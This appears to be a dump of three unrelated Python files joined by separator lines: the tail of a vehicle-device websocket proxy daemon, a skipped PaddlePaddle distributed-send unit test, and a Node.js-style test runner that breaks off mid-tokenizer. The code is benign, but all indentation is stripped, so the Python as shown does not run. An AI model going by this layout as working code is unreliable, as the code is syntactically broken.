end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
signal_sock.close()
def ws_recv(ws, end_event):
while not end_event.is_set():
try:
opcode, data = ws.recv_data(control_frame=True)
if opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
if opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
recv_queue.put_nowait(data)
elif opcode == ABNF.OPCODE_PING:
Params().put("LastAthenaPingTime", str(int(sec_since_boot() * 1e9)))
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
try:
data = send_queue.get_nowait()
except queue.Empty:
data = log_send_queue.get(timeout=1)
ws.send(data)
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
def backoff(retries):
return random.randrange(0, min(128, int(2 ** retries)))
def main():
params = Params()
dongle_id = params.get("DongleId", encoding='utf-8')
crash.init()
crash.bind_user(id=dongle_id)
crash.bind_extra(dirty=dirty, origin=origin, branch=branch, commit=commit,
device=HARDWARE.get_device_type())
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
ws.settimeout(1)
conn_retries = 0
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
break
except Exception:
crash.capture_exception()
cloudlog.exception("athenad.main.exception")
conn_retries += 1
params.delete("LastAthenaPingTime")
time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
test_dist_train.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import time
import unittest
from multiprocessing import Process
import numpy
import paddle.fluid as fluid
import paddle.fluid.layers as layers
class TestSendOp(unittest.TestCase):
@unittest.skip(
"This test is buggy. We cannot use time.sleep to sync processes, the connection may fail in unittest."
)
def test_send(self):
# Run init_serv in a thread
place = fluid.CPUPlace()
# NOTE: python thread will not work here due to GIL.
p = Process(target=self.init_serv, args=(place, ))
p.daemon = True
p.start()
time.sleep(10)
with open("/tmp/paddle.%d.port" % p.pid, "r") as fn:
selected_port = int(fn.readlines()[0])
self.init_client(place, selected_port)
self.run_local(place)
self.assertTrue(numpy.allclose(self.local_out, self.dist_out))
# FIXME(typhoonzero): find a way to gracefully shutdown the server.
os.system("kill -9 %d" % p.pid)
p.join()
def init_serv(self, place):
main = fluid.Program()
with fluid.program_guard(main):
serv = layers.ListenAndServ(
"127.0.0.1:0", ["X"], optimizer_mode=False)
with serv.do():
out_var = main.global_block().create_var(
name="scale_0.tmp_0",
psersistable=True,
dtype="float32",
shape=[32, 32])
x = layers.data(
shape=[32, 32],
dtype='float32',
name="X",
append_batch_size=False)
fluid.initializer.Constant(value=1.0)(x, main.global_block())
layers.scale(x=x, scale=10.0, out=out_var)
self.server_exe = fluid.Executor(place)
self.server_exe.run(main)
def init_client(self, place, port):
main = fluid.Program()
with fluid.program_guard(main):
x = layers.data(
shape=[32, 32],
dtype='float32',
name='X',
append_batch_size=False)
fluid.initializer.Constant(value=2.3)(x, main.global_block())
get_var = main.global_block().create_var(
name="scale_0.tmp_0", # server side var
dtype="float32",
persistable=False,
shape=[32, 32])
o = layers.Send("127.0.0.1:%d" % port, [x], [get_var])
exe = fluid.Executor(place)
self.dist_out = exe.run(main, fetch_list=o) # o is a list
def run_local(self, place):
main = fluid.Program()
with fluid.program_guard(main):
x = layers.data(
shape=[32, 32],
dtype='float32',
name='X',
append_batch_size=False)
fluid.initializer.Constant(value=2.3)(x, main.global_block())
o = layers.scale(x=x, scale=10.0)
exe = fluid.Executor(place)
self.local_out = exe.run(main, fetch_list=[o])
if __name__ == "__main__":
unittest.main()
|
test.py
|
#!/usr/bin/env python
#
# Copyright 2008 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import print_function
import logging
import optparse
import os
import re
import signal
import subprocess
import sys
import tempfile
import time
import threading
import utils
import multiprocessing
import errno
import copy
if sys.version_info >= (3, 5):
from importlib import machinery, util
def get_module(name, path):
loader_details = (machinery.SourceFileLoader, machinery.SOURCE_SUFFIXES)
spec = machinery.FileFinder(path, loader_details).find_spec(name)
module = util.module_from_spec(spec)
spec.loader.exec_module(module)
return module
else:
import imp
def get_module(name, path):
file = None
try:
(file, pathname, description) = imp.find_module(name, [path])
return imp.load_module(name, file, pathname, description)
finally:
if file:
file.close()
from io import open
from os.path import join, dirname, abspath, basename, isdir, exists
from datetime import datetime
try:
from queue import Queue, Empty # Python 3
except ImportError:
from Queue import Queue, Empty # Python 2
from functools import reduce
try:
from urllib.parse import unquote # Python 3
except ImportError:
from urllib import unquote # Python 2
logger = logging.getLogger('testrunner')
skip_regex = re.compile(r'# SKIP\S*\s+(.*)', re.IGNORECASE)
VERBOSE = False
os.umask(0o022)
os.environ['NODE_OPTIONS'] = ''
# ---------------------------------------------
# --- P r o g r e s s I n d i c a t o r s ---
# ---------------------------------------------
class ProgressIndicator(object):
def __init__(self, cases, flaky_tests_mode):
self.cases = cases
self.serial_id = 0
self.flaky_tests_mode = flaky_tests_mode
self.parallel_queue = Queue(len(cases))
self.sequential_queue = Queue(len(cases))
for case in cases:
if case.parallel:
self.parallel_queue.put_nowait(case)
else:
self.sequential_queue.put_nowait(case)
self.succeeded = 0
self.remaining = len(cases)
self.total = len(cases)
self.failed = [ ]
self.flaky_failed = [ ]
self.crashed = 0
self.lock = threading.Lock()
self.shutdown_event = threading.Event()
def GetFailureOutput(self, failure):
output = []
if failure.output.stderr:
output += ["--- stderr ---" ]
output += [failure.output.stderr.strip()]
if failure.output.stdout:
output += ["--- stdout ---"]
output += [failure.output.stdout.strip()]
output += ["Command: %s" % EscapeCommand(failure.command)]
if failure.HasCrashed():
output += ["--- %s ---" % PrintCrashed(failure.output.exit_code)]
if failure.HasTimedOut():
output += ["--- TIMEOUT ---"]
output = "\n".join(output)
return output
def PrintFailureOutput(self, failure):
print(self.GetFailureOutput(failure))
def PrintFailureHeader(self, test):
if test.IsNegative():
negative_marker = '[negative] '
else:
negative_marker = ''
print("=== %(label)s %(negative)s===" % {
'label': test.GetLabel(),
'negative': negative_marker
})
print("Path: %s" % "/".join(test.path))
def Run(self, tasks):
self.Starting()
threads = []
# Spawn N-1 threads and then use this thread as the last one.
# That way -j1 avoids threading altogether which is a nice fallback
# in case of threading problems.
for i in range(tasks - 1):
thread = threading.Thread(target=self.RunSingle, args=[True, i + 1])
threads.append(thread)
thread.start()
try:
self.RunSingle(False, 0)
# Wait for the remaining threads
for thread in threads:
# Use a timeout so that signals (ctrl-c) will be processed.
thread.join(timeout=1000000)
except (KeyboardInterrupt, SystemExit):
self.shutdown_event.set()
except Exception:
# If there's an exception we schedule an interruption for any
# remaining threads.
self.shutdown_event.set()
# ...and then reraise the exception to bail out
raise
self.Done()
return not self.failed
def RunSingle(self, parallel, thread_id):
while not self.shutdown_event.is_set():
try:
test = self.parallel_queue.get_nowait()
except Empty:
if parallel:
return
try:
test = self.sequential_queue.get_nowait()
except Empty:
return
case = test
case.thread_id = thread_id
self.lock.acquire()
case.serial_id = self.serial_id
self.serial_id += 1
self.AboutToRun(case)
self.lock.release()
try:
start = datetime.now()
output = case.Run()
# SmartOS has a bug that causes unexpected ECONNREFUSED errors.
# See https://smartos.org/bugview/OS-2767
# If ECONNREFUSED on SmartOS, retry the test one time.
if (output.UnexpectedOutput() and
sys.platform == 'sunos5' and
'ECONNREFUSED' in output.output.stderr):
output = case.Run()
output.diagnostic.append('ECONNREFUSED received, test retried')
case.duration = (datetime.now() - start)
except IOError:
return
if self.shutdown_event.is_set():
return
self.lock.acquire()
if output.UnexpectedOutput():
if FLAKY in output.test.outcomes and self.flaky_tests_mode == DONTCARE:
self.flaky_failed.append(output)
else:
self.failed.append(output)
if output.HasCrashed():
self.crashed += 1
else:
self.succeeded += 1
self.remaining -= 1
self.HasRun(output)
self.lock.release()
def EscapeCommand(command):
parts = []
for part in command:
if ' ' in part:
# Escape spaces. We may need to escape more characters for this
# to work properly.
parts.append('"%s"' % part)
else:
parts.append(part)
return " ".join(parts)
class SimpleProgressIndicator(ProgressIndicator):
def Starting(self):
print('Running %i tests' % len(self.cases))
def Done(self):
print()
for failed in self.failed:
self.PrintFailureHeader(failed.test)
self.PrintFailureOutput(failed)
if len(self.failed) == 0:
print("===")
print("=== All tests succeeded")
print("===")
else:
print()
print("===")
print("=== %i tests failed" % len(self.failed))
if self.crashed > 0:
print("=== %i tests CRASHED" % self.crashed)
print("===")
class VerboseProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
print('Starting %s...' % case.GetLabel())
sys.stdout.flush()
def HasRun(self, output):
if output.UnexpectedOutput():
if output.HasCrashed():
outcome = 'CRASH'
else:
outcome = 'FAIL'
else:
outcome = 'pass'
print('Done running %s: %s' % (output.test.GetLabel(), outcome))
class DotsProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
pass
def HasRun(self, output):
total = self.succeeded + len(self.failed)
if (total > 1) and (total % 50 == 1):
sys.stdout.write('\n')
if output.UnexpectedOutput():
if output.HasCrashed():
sys.stdout.write('C')
sys.stdout.flush()
elif output.HasTimedOut():
sys.stdout.write('T')
sys.stdout.flush()
else:
sys.stdout.write('F')
sys.stdout.flush()
else:
sys.stdout.write('.')
sys.stdout.flush()
class ActionsAnnotationProgressIndicator(DotsProgressIndicator):
def GetAnnotationInfo(self, test, output):
traceback = output.stdout + output.stderr
find_full_path = re.search(r' +at .*\(.*%s:([0-9]+):([0-9]+)' % test.file, traceback)
col = line = 0
if find_full_path:
line, col = map(int, find_full_path.groups())
root_path = abspath(join(dirname(__file__), '../')) + os.sep
filename = test.file.replace(root_path, "")
return filename, line, col
def PrintFailureOutput(self, failure):
output = self.GetFailureOutput(failure)
filename, line, column = self.GetAnnotationInfo(failure.test, failure.output)
print("::error file=%s,line=%d,col=%d::%s" % (filename, line, column, output.replace('\n', '%0A')))
class TapProgressIndicator(SimpleProgressIndicator):
def _printDiagnostic(self):
logger.info(' severity: %s', self.severity)
self.exitcode and logger.info(' exitcode: %s', self.exitcode)
logger.info(' stack: |-')
for l in self.traceback.splitlines():
logger.info(' ' + l)
def Starting(self):
logger.info('TAP version 13')
logger.info('1..%i' % len(self.cases))
self._done = 0
def AboutToRun(self, case):
pass
def HasRun(self, output):
self._done += 1
self.traceback = ''
self.severity = 'ok'
self.exitcode = ''
# Print test name as (for example) "parallel/test-assert". Tests that are
# scraped from the addons documentation are all named test.js, making it
# hard to decipher what test is running when only the filename is printed.
prefix = abspath(join(dirname(__file__), '../test')) + os.sep
command = output.command[-1]
command = NormalizePath(command, prefix)
if output.UnexpectedOutput():
status_line = 'not ok %i %s' % (self._done, command)
self.severity = 'fail'
self.exitcode = output.output.exit_code
self.traceback = output.output.stdout + output.output.stderr
if FLAKY in output.test.outcomes and self.flaky_tests_mode == DONTCARE:
status_line = status_line + ' # TODO : Fix flaky test'
self.severity = 'flaky'
logger.info(status_line)
if output.HasCrashed():
self.severity = 'crashed'
elif output.HasTimedOut():
self.severity = 'fail'
else:
skip = skip_regex.search(output.output.stdout)
if skip:
logger.info(
'ok %i %s # skip %s' % (self._done, command, skip.group(1)))
else:
status_line = 'ok %i %s' % (self._done, command)
if FLAKY in output.test.outcomes:
status_line = status_line + ' # TODO : Fix flaky test'
logger.info(status_line)
if output.diagnostic:
self.severity = 'ok'
if isinstance(output.diagnostic, list):
self.traceback = '\n'.join(output.diagnostic)
else:
self.traceback = output.diagnostic
duration = output.test.duration
# total_seconds() was added in 2.7
total_seconds = (duration.microseconds +
(duration.seconds + duration.days * 24 * 3600) * 10**6) / 10**6
# duration_ms is measured in seconds and is read as such by TAP parsers.
# It should read as "duration including ms" rather than "duration in ms"
logger.info(' ---')
logger.info(' duration_ms: %d.%d' %
(total_seconds, duration.microseconds / 1000))
if self.severity != 'ok' or self.traceback != '':
if output.HasTimedOut():
self.traceback = 'timeout\n' + output.output.stdout + output.output.stderr
self._printDiagnostic()
logger.info(' ...')
def Done(self):
pass
class DeoptsCheckProgressIndicator(SimpleProgressIndicator):
def Starting(self):
pass
def AboutToRun(self, case):
pass
def HasRun(self, output):
# Print test name as (for example) "parallel/test-assert". Tests that are
# scraped from the addons documentation are all named test.js, making it
# hard to decipher what test is running when only the filename is printed.
prefix = abspath(join(dirname(__file__), '../test')) + os.sep
command = output.command[-1]
command = NormalizePath(command, prefix)
stdout = output.output.stdout.strip()
printed_file = False
for line in stdout.splitlines():
if (
(line.startswith("[aborted optimiz") or line.startswith("[disabled optimiz")) and
("because:" in line or "reason:" in line)
):
if not printed_file:
printed_file = True
print('==== %s ====' % command)
self.failed.append(output)
print(' %s' % line)
def Done(self):
pass
class CompactProgressIndicator(ProgressIndicator):
def __init__(self, cases, flaky_tests_mode, templates):
super(CompactProgressIndicator, self).__init__(cases, flaky_tests_mode)
self.templates = templates
self.last_status_length = 0
self.start_time = time.time()
def Starting(self):
pass
def Done(self):
self.PrintProgress('Done\n')
def AboutToRun(self, case):
self.PrintProgress(case.GetLabel())
def HasRun(self, output):
if output.UnexpectedOutput():
self.ClearLine(self.last_status_length)
self.PrintFailureHeader(output.test)
stdout = output.output.stdout.strip()
if len(stdout):
print(self.templates['stdout'] % stdout)
stderr = output.output.stderr.strip()
if len(stderr):
print(self.templates['stderr'] % stderr)
print("Command: %s" % EscapeCommand(output.command))
if output.HasCrashed():
print("--- %s ---" % PrintCrashed(output.output.exit_code))
if output.HasTimedOut():
print("--- TIMEOUT ---")
def Truncate(self, str, length):
if length and (len(str) > (length - 3)):
return str[:(length-3)] + "..."
else:
return str
def PrintProgress(self, name):
self.ClearLine(self.last_status_length)
elapsed = time.time() - self.start_time
status = self.templates['status_line'] % {
'passed': self.succeeded,
'remaining': (((self.total - self.remaining) * 100) // self.total),
'failed': len(self.failed),
'test': name,
'mins': int(elapsed) / 60,
'secs': int(elapsed) % 60
}
status = self.Truncate(status, 78)
self.last_status_length = len(status)
print(status, end='')
sys.stdout.flush()
class ColorProgressIndicator(CompactProgressIndicator):
def __init__(self, cases, flaky_tests_mode):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|\033[34m%%%(remaining) 4d\033[0m|\033[32m+%(passed) 4d\033[0m|\033[31m-%(failed) 4d\033[0m]: %(test)s",
'stdout': "\033[1m%s\033[0m",
'stderr': "\033[31m%s\033[0m",
}
super(ColorProgressIndicator, self).__init__(cases, flaky_tests_mode, templates)
def ClearLine(self, last_line_length):
print("\033[1K\r", end='')
class MonochromeProgressIndicator(CompactProgressIndicator):
def __init__(self, cases, flaky_tests_mode):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|%%%(remaining) 4d|+%(passed) 4d|-%(failed) 4d]: %(test)s",
'stdout': '%s',
'stderr': '%s',
'clear': lambda last_line_length: ("\r" + (" " * last_line_length) + "\r"),
'max_length': 78
}
super(MonochromeProgressIndicator, self).__init__(cases, flaky_tests_mode, templates)
def ClearLine(self, last_line_length):
print(("\r" + (" " * last_line_length) + "\r"), end='')
PROGRESS_INDICATORS = {
'verbose': VerboseProgressIndicator,
'dots': DotsProgressIndicator,
'actions': ActionsAnnotationProgressIndicator,
'color': ColorProgressIndicator,
'tap': TapProgressIndicator,
'mono': MonochromeProgressIndicator,
'deopts': DeoptsCheckProgressIndicator
}
# -------------------------
# --- F r a m e w o r k ---
# -------------------------
class CommandOutput(object):
def __init__(self, exit_code, timed_out, stdout, stderr):
self.exit_code = exit_code
self.timed_out = timed_out
self.stdout = stdout
self.stderr = stderr
self.failed = None
class TestCase(object):
def __init__(self, context, path, arch, mode):
self.path = path
self.context = context
self.duration = None
self.arch = arch
self.mode = mode
self.parallel = False
self.disable_core_files = False
self.serial_id = 0
self.thread_id = 0
def IsNegative(self):
return self.context.expect_fail
def DidFail(self, output):
if output.failed is None:
output.failed = self.IsFailureOutput(output)
return output.failed
def IsFailureOutput(self, output):
return output.exit_code != 0
def GetSource(self):
return "(no source available)"
def RunCommand(self, command, env):
full_command = self.context.processor(command)
output = Execute(full_command,
self.context,
self.context.GetTimeout(self.mode),
env,
disable_core_files = self.disable_core_files)
return TestOutput(self,
full_command,
output,
self.context.store_unexpected_output)
def Run(self):
try:
result = self.RunCommand(self.GetCommand(), {
"TEST_SERIAL_ID": "%d" % self.serial_id,
"TEST_THREAD_ID": "%d" % self.thread_id,
"TEST_PARALLEL" : "%d" % self.parallel
})
finally:
# Tests can leave the tty in non-blocking mode. If the test runner
# tries to print to stdout/stderr after that and the tty buffer is
# full, it'll die with a EAGAIN OSError. Ergo, put the tty back in
# blocking mode before proceeding.
if sys.platform != 'win32':
from fcntl import fcntl, F_GETFL, F_SETFL
from os import O_NONBLOCK
for fd in 0,1,2: fcntl(fd, F_SETFL, ~O_NONBLOCK & fcntl(fd, F_GETFL))
return result
class TestOutput(object):
def __init__(self, test, command, output, store_unexpected_output):
self.test = test
self.command = command
self.output = output
self.store_unexpected_output = store_unexpected_output
self.diagnostic = []
def UnexpectedOutput(self):
if self.HasCrashed():
outcome = CRASH
elif self.HasTimedOut():
outcome = TIMEOUT
elif self.HasFailed():
outcome = FAIL
else:
outcome = PASS
return not outcome in self.test.outcomes
def HasCrashed(self):
if utils.IsWindows():
return 0x80000000 & self.output.exit_code and not (0x3FFFFF00 & self.output.exit_code)
else:
# Timed out tests will have exit_code -signal.SIGTERM.
if self.output.timed_out:
return False
return self.output.exit_code < 0
def HasTimedOut(self):
return self.output.timed_out
def HasFailed(self):
execution_failed = self.test.DidFail(self.output)
if self.test.IsNegative():
return not execution_failed
else:
return execution_failed
def KillProcessWithID(pid, signal_to_send=signal.SIGTERM):
if utils.IsWindows():
os.popen('taskkill /T /F /PID %d' % pid)
else:
os.kill(pid, signal_to_send)
MAX_SLEEP_TIME = 0.1
INITIAL_SLEEP_TIME = 0.0001
SLEEP_TIME_FACTOR = 1.25
SEM_INVALID_VALUE = -1
SEM_NOGPFAULTERRORBOX = 0x0002 # Microsoft Platform SDK WinBase.h
def Win32SetErrorMode(mode):
prev_error_mode = SEM_INVALID_VALUE
try:
import ctypes
prev_error_mode = ctypes.windll.kernel32.SetErrorMode(mode)
except ImportError:
pass
return prev_error_mode
def KillTimedOutProcess(context, pid):
signal_to_send = signal.SIGTERM
if context.abort_on_timeout:
# Using SIGABRT here allows the OS to generate a core dump that can be
# looked at post-mortem, which helps for investigating failures that are
# difficult to reproduce.
signal_to_send = signal.SIGABRT
KillProcessWithID(pid, signal_to_send)
def RunProcess(context, timeout, args, **rest):
if context.verbose: print("#", " ".join(args))
popen_args = args
prev_error_mode = SEM_INVALID_VALUE
if utils.IsWindows():
if context.suppress_dialogs:
# Try to change the error mode to avoid dialogs on fatal errors. Don't
# touch any existing error mode flags by merging the existing error mode.
# See http://blogs.msdn.com/oldnewthing/archive/2004/07/27/198410.aspx.
error_mode = SEM_NOGPFAULTERRORBOX
prev_error_mode = Win32SetErrorMode(error_mode)
Win32SetErrorMode(error_mode | prev_error_mode)
process = subprocess.Popen(
args = popen_args,
**rest
)
if utils.IsWindows() and context.suppress_dialogs and prev_error_mode != SEM_INVALID_VALUE:
Win32SetErrorMode(prev_error_mode)
# Compute the end time - if the process crosses this limit we
# consider it timed out.
if timeout is None: end_time = None
else: end_time = time.time() + timeout
timed_out = False
# Repeatedly check the exit code from the process in a
# loop and keep track of whether or not it times out.
exit_code = None
sleep_time = INITIAL_SLEEP_TIME
while exit_code is None:
if (not end_time is None) and (time.time() >= end_time):
# Kill the process and wait for it to exit.
KillTimedOutProcess(context, process.pid)
exit_code = process.wait()
timed_out = True
else:
exit_code = process.poll()
time.sleep(sleep_time)
sleep_time = sleep_time * SLEEP_TIME_FACTOR
if sleep_time > MAX_SLEEP_TIME:
sleep_time = MAX_SLEEP_TIME
return (process, exit_code, timed_out)
def PrintError(str):
sys.stderr.write(str)
sys.stderr.write('\n')
def CheckedUnlink(name):
while True:
try:
os.unlink(name)
except OSError as e:
# On Windows unlink() fails if another process (typically a virus scanner
# or the indexing service) has the file open. Those processes keep a
# file open for a short time only, so yield and try again; it'll succeed.
if sys.platform == 'win32' and e.errno == errno.EACCES:
time.sleep(0)
continue
PrintError("os.unlink() " + str(e))
break
def Execute(args, context, timeout=None, env=None, disable_core_files=False, stdin=None):
(fd_out, outname) = tempfile.mkstemp()
(fd_err, errname) = tempfile.mkstemp()
if env is None:
env = {}
env_copy = os.environ.copy()
# Remove NODE_PATH
if "NODE_PATH" in env_copy:
del env_copy["NODE_PATH"]
# Remove NODE_REPL_EXTERNAL_MODULE
if "NODE_REPL_EXTERNAL_MODULE" in env_copy:
del env_copy["NODE_REPL_EXTERNAL_MODULE"]
# Extend environment
for key, value in env.items():
env_copy[key] = value
preexec_fn = None
if disable_core_files and not utils.IsWindows():
def disableCoreFiles():
import resource
resource.setrlimit(resource.RLIMIT_CORE, (0,0))
preexec_fn = disableCoreFiles
(process, exit_code, timed_out) = RunProcess(
context,
timeout,
args = args,
stdin = stdin,
stdout = fd_out,
stderr = fd_err,
env = env_copy,
preexec_fn = preexec_fn
)
os.close(fd_out)
os.close(fd_err)
output = open(outname, encoding='utf8').read()
errors = open(errname, encoding='utf8').read()
CheckedUnlink(outname)
CheckedUnlink(errname)
return CommandOutput(exit_code, timed_out, output, errors)
def CarCdr(path):
if len(path) == 0:
return (None, [ ])
else:
return (path[0], path[1:])
class TestConfiguration(object):
def __init__(self, context, root, section):
self.context = context
self.root = root
self.section = section
def Contains(self, path, file):
if len(path) > len(file):
return False
for i in range(len(path)):
if not path[i].match(NormalizePath(file[i])):
return False
return True
def GetTestStatus(self, sections, defs):
status_file = join(self.root, '%s.status' % self.section)
if exists(status_file):
ReadConfigurationInto(status_file, sections, defs)
class TestSuite(object):
def __init__(self, name):
self.name = name
def GetName(self):
return self.name
class TestRepository(TestSuite):
def __init__(self, path):
normalized_path = abspath(path)
super(TestRepository, self).__init__(basename(normalized_path))
self.path = normalized_path
self.is_loaded = False
self.config = None
def GetConfiguration(self, context):
if self.is_loaded:
return self.config
self.is_loaded = True
module = get_module('testcfg', self.path)
self.config = module.GetConfiguration(context, self.path)
if hasattr(self.config, 'additional_flags'):
self.config.additional_flags += context.node_args
else:
self.config.additional_flags = context.node_args
return self.config
def GetBuildRequirements(self, path, context):
return self.GetConfiguration(context).GetBuildRequirements()
def AddTestsToList(self, result, current_path, path, context, arch, mode):
tests = self.GetConfiguration(context).ListTests(current_path, path,
arch, mode)
result += tests
for i in range(1, context.repeat):
result += copy.deepcopy(tests)
def GetTestStatus(self, context, sections, defs):
self.GetConfiguration(context).GetTestStatus(sections, defs)
class LiteralTestSuite(TestSuite):
def __init__(self, tests_repos, test_root):
super(LiteralTestSuite, self).__init__('root')
self.tests_repos = tests_repos
self.test_root = test_root
def GetBuildRequirements(self, path, context):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests_repos:
if not name or name.match(test.GetName()):
result += test.GetBuildRequirements(rest, context)
return result
def ListTests(self, current_path, path, context, arch, mode):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests_repos:
test_name = test.GetName()
if not name or name.match(test_name):
full_path = current_path + [test_name]
test.AddTestsToList(result, full_path, path, context, arch, mode)
result.sort(key=lambda x: x.GetName())
return result
def GetTestStatus(self, context, sections, defs):
# Just read the test configuration from root_path/root.status.
root = TestConfiguration(context, self.test_root, 'root')
root.GetTestStatus(sections, defs)
for tests_repos in self.tests_repos:
tests_repos.GetTestStatus(context, sections, defs)
TIMEOUT_SCALEFACTOR = {
'armv6' : { 'debug' : 12, 'release' : 3 }, # The ARM buildbots are slow.
'arm' : { 'debug' : 8, 'release' : 2 },
'ia32' : { 'debug' : 4, 'release' : 1 },
'ppc' : { 'debug' : 4, 'release' : 1 },
's390' : { 'debug' : 4, 'release' : 1 } }
class Context(object):
def __init__(self, workspace, verbose, vm, args, expect_fail,
timeout, processor, suppress_dialogs,
store_unexpected_output, repeat, abort_on_timeout):
self.workspace = workspace
self.verbose = verbose
self.vm = vm
self.node_args = args
self.expect_fail = expect_fail
self.timeout = timeout
self.processor = processor
self.suppress_dialogs = suppress_dialogs
self.store_unexpected_output = store_unexpected_output
self.repeat = repeat
self.abort_on_timeout = abort_on_timeout
self.v8_enable_inspector = True
self.node_has_crypto = True
def GetVm(self, arch, mode):
if self.vm is not None:
return self.vm
if arch == 'none':
name = 'out/Debug/node' if mode == 'debug' else 'out/Release/node'
else:
name = 'out/%s.%s/node' % (arch, mode)
# Currently GYP does not support output_dir for MSVS.
# http://code.google.com/p/gyp/issues/detail?id=40
# It will put the builds into Release/node.exe or Debug/node.exe
if utils.IsWindows():
if not exists(name + '.exe'):
name = name.replace('out/', '')
name = os.path.abspath(name + '.exe')
if not exists(name):
raise ValueError('Could not find executable. Should be ' + name)
return name
def GetTimeout(self, mode):
return self.timeout * TIMEOUT_SCALEFACTOR[ARCH_GUESS or 'ia32'][mode]
def RunTestCases(cases_to_run, progress, tasks, flaky_tests_mode):
progress = PROGRESS_INDICATORS[progress](cases_to_run, flaky_tests_mode)
return progress.Run(tasks)
# -------------------------------------------
# --- T e s t C o n f i g u r a t i o n ---
# -------------------------------------------
RUN = 'run'
SKIP = 'skip'
FAIL = 'fail'
PASS = 'pass'
OKAY = 'okay'
TIMEOUT = 'timeout'
CRASH = 'crash'
SLOW = 'slow'
FLAKY = 'flaky'
DONTCARE = 'dontcare'
class Expression(object):
pass
class Constant(Expression):
def __init__(self, value):
self.value = value
def Evaluate(self, env, defs):
return self.value
class Variable(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in env: return set([env[self.name]])
else: return set()
class Outcome(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in defs:
return defs[self.name].GetOutcomes(env, defs)
else:
return set([self.name])
class Operation(Expression):
def __init__(self, left, op, right):
self.left = left
self.op = op
self.right = right
def Evaluate(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.Evaluate(env, defs) or self.right.Evaluate(env, defs)
elif self.op == 'if':
return False
elif self.op == '==':
inter = self.left.GetOutcomes(env, defs) & self.right.GetOutcomes(env, defs)
return bool(inter)
else:
assert self.op == '&&'
return self.left.Evaluate(env, defs) and self.right.Evaluate(env, defs)
def GetOutcomes(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.GetOutcomes(env, defs) | self.right.GetOutcomes(env, defs)
elif self.op == 'if':
if self.right.Evaluate(env, defs):
return self.left.GetOutcomes(env, defs)
else:
return set()
else:
assert self.op == '&&'
return self.left.GetOutcomes(env, defs) & self.right.GetOutcomes(env, defs)
def IsAlpha(str):
for char in str:
if not (char.isalpha() or char.isdigit() or char == '_'):
return False
return True
class Tokenizer(object):
"""A simple string tokenizer that chops expressions into variables,
parens and operators"""
def __init__(self, expr):
self.index = 0
self.expr = expr
self.length = len(expr)
self.tokens = None
def Current(self, length = 1):
if not self.HasMore(length): return ""
return self.expr[self.index:self.index+length]
def HasMore(self, length = 1):
return self.index < self.length + (length - 1)
def Advance(self, count = 1):
self.index = self.index + count
def AddToken(self, token):
self.tokens.append(token)
def SkipSpaces(self):
while self.HasMore() and self.Current().isspace():
self.Advance()
def Tokenize(self):
self.tokens = [ ]
while self.HasMore():
self.SkipSpaces()
if not self.HasMore():
return None
if self.Current() == '(':
self.AddToken('(')
self.Advance()
elif self.Current() == ')':
self.AddToken(')')
self.Advance()
elif self.Current() == '$':
self.AddToken('$')
self.Advance()
elif self.Current() == ',':
self.AddToken(',')
self.Advance()
elif IsAlpha(self.Current()):
buf = ""
while self.HasMore() and IsAlpha(self.Current()):
buf += self.Current()
self.Advance()
self.AddToken(buf)
elif self.Current(2) == '&&':
self.AddToken('&&')
